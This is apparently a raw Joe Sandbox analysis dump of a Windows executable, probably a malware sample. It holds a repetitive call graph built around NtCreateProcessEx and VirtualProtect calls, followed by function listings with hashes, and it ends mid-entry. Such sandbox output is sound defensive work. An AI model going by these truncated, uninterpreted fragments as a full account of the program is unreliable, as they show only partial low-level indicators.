3299 7ff759bf14a9 2 API calls 3297->3299 3298->3290 3298->3297 3300 7ff759bf2a73 3299->3300 3301 7ff759bf14a9 2 API calls 3300->3301 3302 7ff759bf2bd2 3301->3302 3408 7ff759bf14f4 3302->3408 3305 7ff759bf14c7 2 API calls 3306 7ff759bf2c99 3305->3306 3307 7ff759bf14c7 2 API calls 3306->3307 3308 7ff759bf2cb1 3307->3308 3309 7ff759bf145e 2 API calls 3308->3309 3310 7ff759bf2cbb 3309->3310 3311 7ff759bf145e 2 API calls 3310->3311 3312 7ff759bf2cc5 3311->3312 3312->2856 3314 7ff759bf1394 2 API calls 3313->3314 3315 7ff759bf1521 3314->3315 3316 7ff759bf1394 2 API calls 3315->3316 3317 7ff759bf1530 3316->3317 3318 7ff759bf1394 2 API calls 3317->3318 3319 7ff759bf153f 3318->3319 3320 7ff759bf1394 2 API calls 3319->3320 3321 7ff759bf154e 3320->3321 3322 7ff759bf1394 2 API calls 3321->3322 3323 7ff759bf155d 3322->3323 3324 7ff759bf1394 2 API calls 3323->3324 3325 7ff759bf156c 3324->3325 3326 7ff759bf1394 2 API calls 3325->3326 3327 7ff759bf157b 3326->3327 3328 7ff759bf1394 2 API calls 3327->3328 3329 7ff759bf158a 3328->3329 3330 7ff759bf1394 2 API calls 3329->3330 3331 7ff759bf1599 3330->3331 3332 7ff759bf1394 2 API calls 3331->3332 3333 7ff759bf15a8 3332->3333 3334 7ff759bf1394 2 API calls 3333->3334 3335 7ff759bf15b7 3334->3335 3336 7ff759bf1394 2 API calls 3335->3336 3337 7ff759bf15c6 3336->3337 3338 7ff759bf1394 2 API calls 3337->3338 3339 7ff759bf15d5 3338->3339 3340 7ff759bf15e4 3339->3340 3341 7ff759bf1394 2 API calls 3339->3341 3342 7ff759bf1394 2 API calls 3340->3342 3341->3340 3343 7ff759bf15f3 3342->3343 3343->2858 3345 7ff759bf1394 2 API calls 3344->3345 3346 7ff759bf156c 3345->3346 3347 7ff759bf1394 2 API calls 3346->3347 3348 7ff759bf157b 3347->3348 3349 7ff759bf1394 2 API calls 3348->3349 3350 7ff759bf158a 3349->3350 3351 7ff759bf1394 2 API calls 3350->3351 3352 7ff759bf1599 3351->3352 3353 7ff759bf1394 2 API calls 3352->3353 3354 7ff759bf15a8 3353->3354 3355 7ff759bf1394 2 API calls 3354->3355 3356 7ff759bf15b7 3355->3356 3357 7ff759bf1394 2 API calls 3356->3357 3358 7ff759bf15c6 3357->3358 3359 7ff759bf1394 2 API calls 3358->3359 3360 7ff759bf15d5 3359->3360 3361 7ff759bf15e4 3360->3361 3362 7ff759bf1394 2 API calls 3360->3362 3363 7ff759bf1394 2 API calls 3361->3363 3362->3361 3364 7ff759bf15f3 3363->3364 3364->3282 3364->3285 3364->3290 3366 7ff759bf1394 2 API calls 3365->3366 3367 7ff759bf14ef 3366->3367 3368 7ff759bf14f4 3367->3368 3369 7ff759bf1394 2 API calls 3367->3369 3370 7ff759bf1394 2 API calls 3368->3370 3369->3368 3371 7ff759bf14fe 3370->3371 3372 7ff759bf1503 3371->3372 3373 7ff759bf1394 2 API calls 3371->3373 3374 7ff759bf1394 2 API calls 3372->3374 3373->3372 3375 7ff759bf150d 3374->3375 3376 7ff759bf1394 2 API calls 3375->3376 3377 7ff759bf1512 3376->3377 3378 7ff759bf1394 2 API calls 3377->3378 3379 7ff759bf1521 3378->3379 3380 7ff759bf1394 2 API calls 3379->3380 3381 7ff759bf1530 3380->3381 3382 7ff759bf1394 2 API calls 3381->3382 3383 7ff759bf153f 3382->3383 3384 7ff759bf1394 2 API calls 3383->3384 3385 7ff759bf154e 3384->3385 3386 7ff759bf1394 2 API calls 3385->3386 3387 7ff759bf155d 3386->3387 3388 7ff759bf1394 2 API calls 3387->3388 3389 7ff759bf156c 3388->3389 3390 7ff759bf1394 2 API calls 3389->3390 3391 7ff759bf157b 3390->3391 3392 7ff759bf1394 2 API calls 3391->3392 3393 7ff759bf158a 3392->3393 3394 7ff759bf1394 2 API calls 3393->3394 3395 7ff759bf1599 3394->3395 3396 7ff759bf1394 2 API calls 3395->3396 3397 7ff759bf15a8 3396->3397 3398 7ff759bf1394 2 API calls 3397->3398 3399 7ff759bf15b7 3398->3399 3400 7ff759bf1394 2 API calls 3399->3400 3401 7ff759bf15c6 3400->3401 3402 7ff759bf1394 2 API calls 3401->3402 3403 7ff759bf15d5 3402->3403 3404 7ff759bf15e4 3403->3404 3405 7ff759bf1394 2 API calls 3403->3405 3406 7ff759bf1394 2 API calls 3404->3406 3405->3404 3407 7ff759bf15f3 3406->3407 3407->3282 3409 7ff759bf1394 2 API calls 3408->3409 3410 7ff759bf14fe 3409->3410 3411 7ff759bf1503 3410->3411 3412 7ff759bf1394 2 API calls 3410->3412 3413 7ff759bf1394 2 API calls 3411->3413 3412->3411 3414 7ff759bf150d 3413->3414 3415 7ff759bf1394 2 API calls 3414->3415 3416 7ff759bf1512 3415->3416 3417 7ff759bf1394 2 API calls 3416->3417 3418 7ff759bf1521 3417->3418 3419 7ff759bf1394 2 API calls 3418->3419 3420 7ff759bf1530 3419->3420 3421 7ff759bf1394 2 API calls 3420->3421 3422 7ff759bf153f 3421->3422 3423 7ff759bf1394 2 API calls 3422->3423 3424 7ff759bf154e 3423->3424 3425 7ff759bf1394 2 API calls 3424->3425 3426 7ff759bf155d 3425->3426 3427 7ff759bf1394 2 API calls 3426->3427 3428 7ff759bf156c 3427->3428 3429 7ff759bf1394 2 API calls 3428->3429 3430 7ff759bf157b 3429->3430 3431 7ff759bf1394 2 API calls 3430->3431 3432 7ff759bf158a 3431->3432 3433 7ff759bf1394 2 API calls 3432->3433 3434 7ff759bf1599 3433->3434 3435 7ff759bf1394 2 API calls 3434->3435 3436 7ff759bf15a8 3435->3436 3437 7ff759bf1394 2 API calls 3436->3437 3438 7ff759bf15b7 3437->3438 3439 7ff759bf1394 2 API calls 3438->3439 3440 7ff759bf15c6 3439->3440 3441 7ff759bf1394 2 API calls 3440->3441 3442 7ff759bf15d5 3441->3442 3443 7ff759bf15e4 3442->3443 3444 7ff759bf1394 2 API calls 3442->3444 3445 7ff759bf1394 2 API calls 3443->3445 3444->3443 3446 7ff759bf15f3 3445->3446 3446->3305 3448 7ff759bf1394 2 API calls 3447->3448 3449 7ff759bf1431 3448->3449 3450 7ff759bf1394 2 API calls 3449->3450 3451 7ff759bf1440 3450->3451 3452 7ff759bf1394 2 API calls 3451->3452 3453 7ff759bf144f 3452->3453 3454 7ff759bf1394 2 API calls 3453->3454 3455 7ff759bf145e 3454->3455 3456 7ff759bf1394 2 API calls 3455->3456 3457 7ff759bf146d 3456->3457 3458 7ff759bf1394 2 API calls 3457->3458 3459 7ff759bf147c 3458->3459 3460 7ff759bf1394 2 API calls 3459->3460 3461 7ff759bf148b 3460->3461 3462 7ff759bf1394 2 API calls 3461->3462 3463 7ff759bf149a 3462->3463 3464 7ff759bf1394 2 API calls 3463->3464 3465 7ff759bf14a9 3464->3465 3466 7ff759bf1394 2 API calls 3465->3466 3467 7ff759bf14b8 3466->3467 3468 7ff759bf1394 2 API calls 3467->3468 3469 7ff759bf14c7 3468->3469 3470 7ff759bf1394 2 API calls 3469->3470 3471 7ff759bf14d6 3470->3471 3472 7ff759bf14e5 3471->3472 3473 7ff759bf1394 2 API calls 3471->3473 3474 7ff759bf1394 2 API calls 3472->3474 3473->3472 3475 7ff759bf14ef 3474->3475 3476 7ff759bf14f4 3475->3476 3477 7ff759bf1394 2 API calls 3475->3477 3478 7ff759bf1394 2 API calls 3476->3478 3477->3476 3479 7ff759bf14fe 3478->3479 3480 7ff759bf1503 3479->3480 3481 7ff759bf1394 2 API calls 3479->3481 3482 7ff759bf1394 2 API calls 3480->3482 3481->3480 3483 7ff759bf150d 3482->3483 3484 7ff759bf1394 2 API calls 3483->3484 3485 7ff759bf1512 3484->3485 3486 7ff759bf1394 2 API calls 3485->3486 3487 7ff759bf1521 3486->3487 3488 7ff759bf1394 2 API calls 3487->3488 3489 7ff759bf1530 3488->3489 3490 7ff759bf1394 2 API calls 3489->3490 3491 7ff759bf153f 3490->3491 3492 7ff759bf1394 2 API calls 3491->3492 3493 7ff759bf154e 3492->3493 3494 7ff759bf1394 2 API calls 3493->3494 3495 7ff759bf155d 3494->3495 3496 7ff759bf1394 2 API calls 3495->3496 3497 7ff759bf156c 3496->3497 3498 7ff759bf1394 2 API calls 3497->3498 3499 7ff759bf157b 3498->3499 3500 7ff759bf1394 2 API calls 3499->3500 3501 7ff759bf158a 3500->3501 3502 7ff759bf1394 2 API calls 3501->3502 3503 7ff759bf1599 3502->3503 3504 7ff759bf1394 2 API calls 3503->3504 3505 7ff759bf15a8 3504->3505 3506 7ff759bf1394 2 API calls 3505->3506 3507 7ff759bf15b7 3506->3507 3508 7ff759bf1394 2 API calls 3507->3508 3509 7ff759bf15c6 3508->3509 3510 7ff759bf1394 2 API calls 3509->3510 3511 7ff759bf15d5 3510->3511 3512 7ff759bf15e4 3511->3512 3513 7ff759bf1394 2 API calls 3511->3513 3514 7ff759bf1394 2 API calls 3512->3514 3513->3512 3515 7ff759bf15f3 3514->3515 3515->3195 3517 7ff759bf1394 2 API calls 3516->3517 3518 7ff759bf1440 3517->3518 3519 7ff759bf1394 2 API calls 3518->3519 3520 7ff759bf144f 3519->3520 3521 7ff759bf1394 2 API calls 3520->3521 3522 7ff759bf145e 3521->3522 3523 7ff759bf1394 2 API calls 3522->3523 3524 7ff759bf146d 3523->3524 3525 7ff759bf1394 2 API calls 3524->3525 3526 7ff759bf147c 3525->3526 3527 7ff759bf1394 2 API calls 3526->3527 3528 7ff759bf148b 3527->3528 3529 7ff759bf1394 2 API calls 3528->3529 3530 7ff759bf149a 3529->3530 3531 7ff759bf1394 2 API calls 3530->3531 3532 7ff759bf14a9 3531->3532 3533 7ff759bf1394 2 API calls 3532->3533 3534 7ff759bf14b8 3533->3534 3535 7ff759bf1394 2 API calls 3534->3535 3536 7ff759bf14c7 3535->3536 3537 7ff759bf1394 2 API calls 3536->3537 3538 7ff759bf14d6 3537->3538 3539 7ff759bf14e5 3538->3539 3540 7ff759bf1394 2 API calls 3538->3540 3541 7ff759bf1394 2 API calls 3539->3541 3540->3539 3542 7ff759bf14ef 3541->3542 3543 7ff759bf14f4 3542->3543 3544 7ff759bf1394 2 API calls 3542->3544 3545 7ff759bf1394 2 API calls 3543->3545 3544->3543 3546 7ff759bf14fe 3545->3546 3547 7ff759bf1503 3546->3547 3548 7ff759bf1394 2 API calls 3546->3548 3549 7ff759bf1394 2 API calls 3547->3549 3548->3547 3550 7ff759bf150d 3549->3550 3551 7ff759bf1394 2 API calls 3550->3551 3552 7ff759bf1512 3551->3552 3553 7ff759bf1394 2 API calls 3552->3553 3554 7ff759bf1521 3553->3554 3555 7ff759bf1394 2 API calls 3554->3555 3556 7ff759bf1530 3555->3556 3557 7ff759bf1394 2 API calls 3556->3557 3558 7ff759bf153f 3557->3558 3559 7ff759bf1394 2 API calls 3558->3559 3560 7ff759bf154e 3559->3560 3561 7ff759bf1394 2 API calls 3560->3561 3562 7ff759bf155d 3561->3562 3563 7ff759bf1394 2 API calls 3562->3563 3564 7ff759bf156c 3563->3564 3565 7ff759bf1394 2 API calls 3564->3565 3566 7ff759bf157b 3565->3566 3567 7ff759bf1394 2 API calls 3566->3567 3568 7ff759bf158a 3567->3568 3569 7ff759bf1394 2 API calls 3568->3569 3570 7ff759bf1599 3569->3570 3571 7ff759bf1394 2 API calls 3570->3571 3572 7ff759bf15a8 3571->3572 3573 7ff759bf1394 2 API calls 3572->3573 3574 7ff759bf15b7 3573->3574 3575 7ff759bf1394 2 API calls 3574->3575 3576 7ff759bf15c6 3575->3576 3577 7ff759bf1394 2 API calls 3576->3577 3578 7ff759bf15d5 3577->3578 3579 7ff759bf15e4 3578->3579 3580 7ff759bf1394 2 API calls 3578->3580 3581 7ff759bf1394 2 API calls 3579->3581 3580->3579 3582 7ff759bf15f3 3581->3582 3582->3198 3584 7ff759bf1394 2 API calls 3583->3584 3585 7ff759bf14c7 3584->3585 3586 7ff759bf1394 2 API calls 3585->3586 3587 7ff759bf14d6 3586->3587 3588 7ff759bf14e5 3587->3588 3589 7ff759bf1394 2 API calls 3587->3589 3590 7ff759bf1394 2 API calls 3588->3590 3589->3588 3591 7ff759bf14ef 3590->3591 3592 7ff759bf14f4 3591->3592 3593 7ff759bf1394 2 API calls 3591->3593 3594 7ff759bf1394 2 API calls 3592->3594 3593->3592 3595 7ff759bf14fe 3594->3595 3596 7ff759bf1503 3595->3596 3597 7ff759bf1394 2 API calls 3595->3597 3598 7ff759bf1394 2 API calls 3596->3598 3597->3596 3599 7ff759bf150d 3598->3599 3600 7ff759bf1394 2 API calls 3599->3600 3601 7ff759bf1512 3600->3601 3602 7ff759bf1394 2 API calls 3601->3602 3603 7ff759bf1521 3602->3603 3604 7ff759bf1394 2 API calls 3603->3604 3605 7ff759bf1530 3604->3605 3606 7ff759bf1394 2 API calls 3605->3606 3607 7ff759bf153f 3606->3607 3608 7ff759bf1394 2 API calls 3607->3608 3609 7ff759bf154e 3608->3609 3610 7ff759bf1394 2 API calls 3609->3610 3611 7ff759bf155d 3610->3611 3612 7ff759bf1394 2 API calls 3611->3612 3613 7ff759bf156c 3612->3613 3614 7ff759bf1394 2 API calls 3613->3614 3615 7ff759bf157b 3614->3615 3616 7ff759bf1394 2 API calls 3615->3616 3617 7ff759bf158a 3616->3617 3618 7ff759bf1394 2 API calls 3617->3618 3619 7ff759bf1599 3618->3619 3620 7ff759bf1394 2 API calls 3619->3620 3621 7ff759bf15a8 3620->3621 3622 7ff759bf1394 2 API calls 3621->3622 3623 7ff759bf15b7 3622->3623 3624 7ff759bf1394 2 API calls 3623->3624 3625 7ff759bf15c6 3624->3625 3626 7ff759bf1394 2 API calls 3625->3626 3627 7ff759bf15d5 3626->3627 3628 7ff759bf15e4 3627->3628 3629 7ff759bf1394 2 API calls 3627->3629 3630 7ff759bf1394 2 API calls 3628->3630 3629->3628 3631 7ff759bf15f3 3630->3631 3631->3260 3633 7ff759bf15e4 3632->3633 3634 7ff759bf1394 2 API calls 3632->3634 3635 7ff759bf1394 2 API calls 3633->3635 3634->3633 3636 7ff759bf15f3 3635->3636 3636->3260 3638 7ff759bf1394 2 API calls 3637->3638 3639 7ff759bf149a 3638->3639 3640 7ff759bf1394 2 API calls 3639->3640 3641 7ff759bf14a9 3640->3641 3642 7ff759bf1394 2 API calls 3641->3642 3643 7ff759bf14b8 3642->3643 3644 7ff759bf1394 2 API calls 3643->3644 3645 7ff759bf14c7 3644->3645 3646 7ff759bf1394 2 API calls 3645->3646 3647 7ff759bf14d6 3646->3647 3648 7ff759bf14e5 3647->3648 3649 7ff759bf1394 2 API calls 3647->3649 3650 7ff759bf1394 2 API calls 3648->3650 3649->3648 3651 7ff759bf14ef 3650->3651 3652 7ff759bf14f4 3651->3652 3653 7ff759bf1394 2 API calls 3651->3653 3654 7ff759bf1394 2 API calls 3652->3654 3653->3652 3655 7ff759bf14fe 3654->3655 3656 7ff759bf1503 3655->3656 3657 7ff759bf1394 2 API calls 3655->3657 3658 7ff759bf1394 2 API calls 3656->3658 3657->3656 3659 7ff759bf150d 3658->3659 3660 7ff759bf1394 2 API calls 3659->3660 3661 7ff759bf1512 3660->3661 3662 7ff759bf1394 2 API calls 3661->3662 3663 7ff759bf1521 3662->3663 3664 7ff759bf1394 2 API calls 3663->3664 3665 7ff759bf1530 3664->3665 3666 7ff759bf1394 2 API calls 3665->3666 3667 7ff759bf153f 3666->3667 3668 7ff759bf1394 2 API calls 3667->3668 3669 7ff759bf154e 3668->3669 3670 7ff759bf1394 2 API calls 3669->3670 3671 7ff759bf155d 3670->3671 3672 7ff759bf1394 2 API calls 3671->3672 3673 7ff759bf156c 3672->3673 3674 7ff759bf1394 2 API calls 3673->3674 3675 7ff759bf157b 3674->3675 3676 7ff759bf1394 2 API calls 3675->3676 3677 7ff759bf158a 3676->3677 3678 7ff759bf1394 2 API calls 3677->3678 3679 7ff759bf1599 3678->3679 3680 7ff759bf1394 2 API calls 3679->3680 3681 7ff759bf15a8 3680->3681 3682 7ff759bf1394 2 API calls 3681->3682 3683 7ff759bf15b7 3682->3683 3684 7ff759bf1394 2 API calls 3683->3684 3685 7ff759bf15c6 3684->3685 3686 7ff759bf1394 2 API calls 3685->3686 3687 7ff759bf15d5 3686->3687 3688 7ff759bf15e4 3687->3688 3689 7ff759bf1394 2 API calls 3687->3689 3690 7ff759bf1394 2 API calls 3688->3690 3689->3688 3691 7ff759bf15f3 3690->3691 3691->3257 3692 7ff759bf149a 3691->3692 3693 7ff759bf1394 2 API calls 3692->3693 3694 7ff759bf14a9 3693->3694 3695 7ff759bf1394 2 API calls 3694->3695 3696 7ff759bf14b8 3695->3696 3697 7ff759bf1394 2 API calls 3696->3697 3698 7ff759bf14c7 3697->3698 3699 7ff759bf1394 2 API calls 3698->3699 3700 7ff759bf14d6 3699->3700 3701 7ff759bf14e5 3700->3701 3702 7ff759bf1394 2 API calls 3700->3702 3703 7ff759bf1394 2 API calls 3701->3703 3702->3701 3704 7ff759bf14ef 3703->3704 3705 7ff759bf14f4 3704->3705 3706 7ff759bf1394 2 API calls 3704->3706 3707 7ff759bf1394 2 API calls 3705->3707 3706->3705 3708 7ff759bf14fe 3707->3708 3709 7ff759bf1503 3708->3709 3710 7ff759bf1394 2 API calls 3708->3710 3711 7ff759bf1394 2 API calls 3709->3711 3710->3709 3712 7ff759bf150d 3711->3712 3713 7ff759bf1394 2 API calls 3712->3713 3714 7ff759bf1512 3713->3714 3715 7ff759bf1394 2 API calls 3714->3715 3716 7ff759bf1521 3715->3716 3717 7ff759bf1394 2 API calls 3716->3717 3718 7ff759bf1530 3717->3718 3719 7ff759bf1394 2 API calls 3718->3719 3720 7ff759bf153f 3719->3720 3721 7ff759bf1394 2 API calls 3720->3721 3722 7ff759bf154e 3721->3722 3723 7ff759bf1394 2 API calls 3722->3723 3724 7ff759bf155d 3723->3724 3725 7ff759bf1394 2 API calls 3724->3725 3726 7ff759bf156c 3725->3726 3727 7ff759bf1394 2 API calls 3726->3727 3728 7ff759bf157b 3727->3728 3729 7ff759bf1394 2 API calls 3728->3729 3730 7ff759bf158a 3729->3730 3731 7ff759bf1394 2 API calls 3730->3731 3732 7ff759bf1599 3731->3732 3733 7ff759bf1394 2 API calls 3732->3733 3734 7ff759bf15a8 3733->3734 3735 7ff759bf1394 2 API calls 3734->3735 3736 7ff759bf15b7 3735->3736 3737 7ff759bf1394 2 API calls 3736->3737 3738 7ff759bf15c6 3737->3738 3739 7ff759bf1394 2 API calls 3738->3739 3740 7ff759bf15d5 3739->3740 3741 7ff759bf15e4 3740->3741 3742 7ff759bf1394 2 API calls 3740->3742 3743 7ff759bf1394 2 API calls 3741->3743 3742->3741 3744 7ff759bf15f3 3743->3744 3744->3257 3744->3268 3746 7ff759bf1394 2 API calls 3745->3746 3747 7ff759bf148b 3746->3747 3748 7ff759bf1394 2 API calls 3747->3748 3749 7ff759bf149a 3748->3749 3750 7ff759bf1394 2 API calls 3749->3750 3751 7ff759bf14a9 3750->3751 3752 7ff759bf1394 2 API calls 3751->3752 3753 7ff759bf14b8 3752->3753 3754 7ff759bf1394 2 API calls 3753->3754 3755 7ff759bf14c7 3754->3755 3756 7ff759bf1394 2 API calls 3755->3756 3757 7ff759bf14d6 3756->3757 3758 7ff759bf14e5 3757->3758 3759 7ff759bf1394 2 API calls 3757->3759 3760 7ff759bf1394 2 API calls 3758->3760 3759->3758 3761 7ff759bf14ef 3760->3761 3762 7ff759bf14f4 3761->3762 3763 7ff759bf1394 2 API calls 3761->3763 3764 7ff759bf1394 2 API calls 3762->3764 3763->3762 3765 7ff759bf14fe 3764->3765 3766 7ff759bf1503 3765->3766 3767 7ff759bf1394 2 API calls 3765->3767 3768 7ff759bf1394 2 API calls 3766->3768 3767->3766 3769 7ff759bf150d 3768->3769 3770 7ff759bf1394 2 API calls 3769->3770 3771 7ff759bf1512 3770->3771 3772 7ff759bf1394 2 API calls 3771->3772 3773 7ff759bf1521 3772->3773 3774 7ff759bf1394 2 API calls 3773->3774 3775 7ff759bf1530 3774->3775 3776 7ff759bf1394 2 API calls 3775->3776 3777 7ff759bf153f 3776->3777 3778 7ff759bf1394 2 API calls 3777->3778 3779 7ff759bf154e 3778->3779 3780 7ff759bf1394 2 API calls 3779->3780 3781 7ff759bf155d 3780->3781 3782 7ff759bf1394 2 API calls 3781->3782 3783 7ff759bf156c 3782->3783 3784 7ff759bf1394 2 API calls 3783->3784 3785 7ff759bf157b 3784->3785 3786 7ff759bf1394 2 API calls 3785->3786 3787 7ff759bf158a 3786->3787 3788 7ff759bf1394 2 API calls 3787->3788 3789 7ff759bf1599 3788->3789 3790 7ff759bf1394 2 API calls 3789->3790 3791 7ff759bf15a8 3790->3791 3792 7ff759bf1394 2 API calls 3791->3792 3793 7ff759bf15b7 3792->3793 3794 7ff759bf1394 2 API calls 3793->3794 3795 7ff759bf15c6 3794->3795 3796 7ff759bf1394 2 API calls 3795->3796 3797 7ff759bf15d5 3796->3797 3798 7ff759bf15e4 3797->3798 3799 7ff759bf1394 2 API calls 3797->3799 3800 7ff759bf1394 2 API calls 3798->3800 3799->3798 3801 7ff759bf15f3 3800->3801 3801->3273 3803 7ff759bf1394 2 API calls 3802->3803 3804 7ff759bf15d5 3803->3804 3805 7ff759bf15e4 3804->3805 3806 7ff759bf1394 2 API calls 3804->3806 3807 7ff759bf1394 2 API calls 3805->3807 3806->3805 3808 7ff759bf15f3 3807->3808 3808->3254 3838 7ff759bf1000 3839 7ff759bf108b __set_app_type 3838->3839 3840 7ff759bf1040 3838->3840 3842 7ff759bf10b6 3839->3842 3840->3839 3841 7ff759bf10e5 3842->3841 3844 7ff759bf1e00 3842->3844 3845 7ff759bf8980 __setusermatherr 3844->3845 3846 7ff759bf1800 3847 7ff759bf1812 3846->3847 3848 7ff759bf1835 fprintf 3847->3848 3858 7ff759bf2320 strlen 3859 7ff759bf2337 3858->3859 3860 7ff759bf219e 3861 7ff759bf2272 3860->3861 3862 7ff759bf21ab EnterCriticalSection 3860->3862 3863 7ff759bf2265 LeaveCriticalSection 3862->3863 3865 7ff759bf21c8 3862->3865 3863->3861 3864 7ff759bf21e9 TlsGetValue GetLastError 3864->3865 3865->3863 3865->3864 3866 7ff759bf1ab3 3867 7ff759bf199e 3866->3867 3867->3866 3868 7ff759bf1b36 3867->3868 3870 7ff759bf1a0f 3867->3870 3871 7ff759bf19e9 VirtualProtect 3867->3871 3869 7ff759bf1ba0 4 API calls 3868->3869 3869->3870 3871->3867 2478 7ff759bf1394 2482 7ff759bf83f0 2478->2482 2480 7ff759bf13b8 2481 7ff759bf13c6 NtCreateProcessEx 2480->2481 2483 7ff759bf840e 2482->2483 2486 7ff759bf843b 2482->2486 2483->2480 2484 7ff759bf84e3 2485 7ff759bf84ff malloc 2484->2485 2487 7ff759bf8520 2485->2487 2486->2483 2486->2484 2487->2483 3820 7ff759bf216f 3821 7ff759bf2178 InitializeCriticalSection 3820->3821 3822 7ff759bf2185 3820->3822 3821->3822 3823 7ff759bf1a70 3824 7ff759bf199e 3823->3824 3824->3823 3825 7ff759bf1a0f 3824->3825 3826 7ff759bf19e9 VirtualProtect 3824->3826 3827 7ff759bf1b36 3824->3827 3826->3823 3826->3824 3828 7ff759bf1ba0 4 API calls 3827->3828 3828->3825 3849 7ff759bf1e10 3850 7ff759bf1e2f 3849->3850 3851 7ff759bf1e55 3850->3851 3852 7ff759bf1ecc 3850->3852 3853 7ff759bf1eb5 3850->3853 3851->3853 3857 7ff759bf1f12 signal 3851->3857 3852->3853 3854 7ff759bf1ed3 signal 3852->3854 3854->3853 3855 7ff759bf1ee4 3854->3855 3855->3853 3856 7ff759bf1eea signal 3855->3856 3856->3853 3857->3853 3884 7ff759bf1fd0 3885 7ff759bf1fe4 3884->3885 3886 7ff759bf2033 3884->3886 3885->3886 3887 7ff759bf1ffd EnterCriticalSection LeaveCriticalSection 3885->3887 3887->3886 3888 7ff759bf2050 3889 7ff759bf20cf 3888->3889 3890 7ff759bf205e EnterCriticalSection 3888->3890 3891 7ff759bf20c2 LeaveCriticalSection 3890->3891 3892 7ff759bf2079 3890->3892 3891->3889 3892->3891 3893 7ff759bf20bd free 3892->3893 3893->3891 3894 7ff759bf1f47 3895 7ff759bf1e99 3894->3895 3896 7ff759bf1e67 signal 3894->3896 3896->3895 3897 7ff759bf1e7c 3896->3897 3897->3895 3898 7ff759bf1e82 signal 3897->3898 3898->3895

                                                        Executed Functions

                                                        Function 00007FF759BF1160 Relevance: 13.6, APIs: 9, Instructions: 130sleepstringCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000018.00000002.2169468768.00007FF759BF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF759BF0000, based on PE: true
                                                        • Associated: 00000018.00000002.2169429774.00007FF759BF0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                        • Associated: 00000018.00000002.2169519728.00007FF759BF9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                        • Associated: 00000018.00000002.2169543810.00007FF759BFB000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                        • Associated: 00000018.00000002.2169773037.00007FF759E74000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_24_2_7ff759bf0000_jjlazghkkuth.jbxd
                                                        Similarity
                                                        • API ID: malloc$ExceptionFilterSleepUnhandled_amsg_exit_cexit_inittermmemcpystrlen
                                                        • String ID:
                                                        • API String ID: 2643109117-0
                                                        • Opcode ID: ef29aa538128acd76b923304bcce7985f3f41b3f1f1ed9bc751512ae57c1cafe
                                                        • Instruction ID: b5aaab7eab15ccc099b22452c37fe8e8d511a761a5b8762437cfec510680e2f7
                                                        • Opcode Fuzzy Hash: ef29aa538128acd76b923304bcce7985f3f41b3f1f1ed9bc751512ae57c1cafe
                                                        • Instruction Fuzzy Hash: A2510B22E1964A85FA10BF65EA90379A7B1AF44B90FCC5435C94D473A1FF2CE486C721
                                                        Function 00007FF759BF1394 Relevance: 1.5, APIs: 1, Instructions: 24nativeCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        APIs
                                                        • NtCreateProcessEx.NTDLL(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF759BF1156), ref: 00007FF759BF13F7
                                                        Memory Dump Source
                                                        • Source File: 00000018.00000002.2169468768.00007FF759BF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF759BF0000, based on PE: true
                                                        • Associated: 00000018.00000002.2169429774.00007FF759BF0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                        • Associated: 00000018.00000002.2169519728.00007FF759BF9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                        • Associated: 00000018.00000002.2169543810.00007FF759BFB000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                        • Associated: 00000018.00000002.2169773037.00007FF759E74000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_24_2_7ff759bf0000_jjlazghkkuth.jbxd
                                                        Similarity
                                                        • API ID: CreateProcess
                                                        • String ID:
                                                        • API String ID: 963392458-0
                                                        • Opcode ID: 44d218f324a4a60e69f590186adc03f2af2ae93ee84cdde52191a9f821aa7650
                                                        • Instruction ID: f1c61f84f2d275c6989de90c26a1c03f5566b04f94209f0f299be8b0ea98bb22
                                                        • Opcode Fuzzy Hash: 44d218f324a4a60e69f590186adc03f2af2ae93ee84cdde52191a9f821aa7650
                                                        • Instruction Fuzzy Hash: BDF0FF7290CB5AC2FA14EF66F85002AB774FB88B80F444435E99D43725EF3CE0518B64

                                                        Non-executed Functions

                                                        Function 00007FF759BF3350 Relevance: 21.2, APIs: 9, Strings: 5, Instructions: 206COMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000018.00000002.2169468768.00007FF759BF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF759BF0000, based on PE: true
                                                        • Associated: 00000018.00000002.2169429774.00007FF759BF0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                        • Associated: 00000018.00000002.2169519728.00007FF759BF9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                        • Associated: 00000018.00000002.2169543810.00007FF759BFB000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                        • Associated: 00000018.00000002.2169773037.00007FF759E74000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_24_2_7ff759bf0000_jjlazghkkuth.jbxd
                                                        Similarity
                                                        • API ID: memset$wcscatwcscpywcslen
                                                        • String ID: $0$0$@$@
                                                        • API String ID: 4263182637-1413854666
                                                        • Opcode ID: 4d512575b54fdde5b2efe29d73fe70a91ca72ef17a151f0fc642e1fa6fb95c69
                                                        • Instruction ID: e2e6fa6153b7e95532df4247ed27cab09ec2d94ad30a30a9210771fea9b55dc2
                                                        • Opcode Fuzzy Hash: 4d512575b54fdde5b2efe29d73fe70a91ca72ef17a151f0fc642e1fa6fb95c69
                                                        • Instruction Fuzzy Hash: DFB1A12290CAD585F721AF24E4453BAF7B0FF84384F885235EA8942B95EF7DD186CB11
                                                        Function 00007FF759BF2690 Relevance: 19.6, APIs: 8, Strings: 3, Instructions: 322COMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        APIs
                                                        Strings
                                                        Memory Dump Source
